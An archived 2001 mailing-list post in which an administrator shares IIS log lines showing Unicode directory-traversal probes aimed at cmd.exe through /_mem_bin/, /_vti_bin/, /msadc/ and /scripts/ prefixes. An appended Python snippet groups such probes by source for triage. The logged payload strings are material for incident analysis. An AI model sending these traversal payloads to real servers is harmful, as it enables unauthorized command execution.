Found this in my logs

From: Hamid T Ouyachchi (btihtoat_private)
Date: Mon Apr 30 2001 - 11:05:41 PDT

    Hello all,
    
    Found this in my IIS logs. I recognize the Unicode exploit attempts, FrontPage
    msdacs stuff. But what is the /mem-bin/ entry about?
    
    Hamid Ouyachi
    Contractor
    Office of Workforce Security
    Phone: (202)219-5935 x302
    
    
    2001-04-20 04:41:21 211.61.250.248 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 604 199 0 80 HTTP/1.0 TeamSoft+WinInet+Component - -
    2001-04-20 13:44:13 195.6.99.109 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 623 177 0 80 HTTP/1.1 TeamSoft+WinInet+Component - -
    2001-04-26 12:23:17 195.219.50.243 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3 604 199 0 80 HTTP/1.0 TeamSoft+WinInet+Component - -
    2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 66 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 86 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:53 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 100 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 99 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 99 0 80 HTTP/1.0 - - -
    2001-04-26 22:21:55 24.40.7.245 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 100 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:47 202.111.82.199 - W3SVC3 [ ]   GET /_mem_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:49 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:50 202.111.82.199 - W3SVC3 [ ]   GET /_mem_bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:52 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:53 202.111.82.199 - W3SVC3 [ ]   GET /_vti_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:54 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:56 202.111.82.199 - W3SVC3 [ ]   GET /_vti_bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 16 80 HTTP/1.0 - - -
    2001-04-28 08:30:57 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:30:58 202.111.82.199 - W3SVC3 [ ]   GET /cgi-bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:00 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:01 202.111.82.199 - W3SVC3 [ ]   GET /cgi-bin/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:02 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 77 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:04 202.111.82.199 - W3SVC3 [ ]   GET /msadc/..À/..À/winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:05 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:08 202.111.82.199 - W3SVC3 [ ]   GET /msadc/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:10 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:12 202.111.82.199 - W3SVC3 [ ]   GET /scripts/..À/..À/..À/winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:13 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:14 202.111.82.199 - W3SVC3 [ ]   GET /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:16 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 85 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:17 202.111.82.199 - W3SVC3 [ ]   GET /scripts/ccc.exe - 404 3 604 35 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:19 202.111.82.199 - W3SVC3 [ ]   GET /scripts/cmd.exe - 404 3 604 35 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:20 202.111.82.199 - W3SVC3 [ ]   GET /_vti_cnf/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:21 202.111.82.199 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
    2001-04-28 08:31:23 202.111.82.199 - W3SVC3 [ ]   GET /_vti_cnf/..Á..Á..Á../winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
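
One way to triage an excerpt like this, as an added example that is not part of the original post: group the cmd.exe requests by source address and list the leading directory each one went through, which shows whether an unfamiliar prefix such as /_mem_bin/ arrived on its own or as one entry in a sweep of several directories. The sample lines are constructed in the same field layout with documentation addresses, and the function names are hypothetical.

```python
# Constructed sample in the same field layout as the excerpt above;
# source addresses are replaced with documentation ranges (192.0.2.0/24).
SAMPLE_LOG = """\
2001-04-28 08:30:47 192.0.2.10 - W3SVC3 [ ]   GET /_mem_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:49 192.0.2.10 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:30:53 192.0.2.10 - W3SVC3 [ ]   GET /_vti_bin/..À/..À/winnt/system32/cmd.exe - 404 3 604 78 0 80 HTTP/1.0 - - -
2001-04-28 08:31:04 192.0.2.10 - W3SVC3 [ ]   GET /msadc/..À/..À/winnt/system32/cmd.exe - 404 3 604 75 0 80 HTTP/1.0 - - -
2001-04-26 22:21:53 192.0.2.77 - W3SVC3 [ ]   GET /winnt/system32/cmd.exe /c+dir 404 3 604 66 0 80 HTTP/1.0 - - -
2001-04-28 09:00:00 192.0.2.50 - W3SVC3 [ ]   GET /default.htm - 200 0 1200 60 0 80 HTTP/1.0 - - -
"""


def parse_line(line):
    """Split one log line into the fields used below; None if the layout differs."""
    f = line.split()
    if len(f) < 11 or f[5:7] != ["[", "]"]:
        return None
    return {"ip": f[2], "method": f[7], "uri": f[8], "query": f[9], "status": f[10]}


def summarize_probes(lines):
    """Per source address: cmd.exe / traversal requests, prefixes tried, statuses seen."""
    out = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        uri = rec["uri"]
        traversal = ".." in uri
        if not (traversal or uri.lower().endswith("/cmd.exe")):
            continue  # ordinary request, not part of the probe pattern
        s = out.setdefault(rec["ip"], {"requests": 0, "traversal": 0,
                                       "prefixes": [], "statuses": []})
        s["requests"] += 1
        s["traversal"] += int(traversal)
        prefix = uri.strip("/").split("/")[0]  # first directory in the request path
        if prefix not in s["prefixes"]:
            s["prefixes"].append(prefix)
        if rec["status"] not in s["statuses"]:
            s["statuses"].append(rec["status"])  # anything other than 404 needs follow-up
    return out


if __name__ == "__main__":
    for ip, s in summarize_probes(SAMPLE_LOG.splitlines()).items():
        print(ip, s["requests"], "requests,", s["traversal"], "with '..';",
              "prefixes:", ", ".join(s["prefixes"]), "; statuses:", ",".join(s["statuses"]))
```
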
    



    This archive was generated by hypermail 2b30 : Tue May 01 2001 - 03:40:36 PDT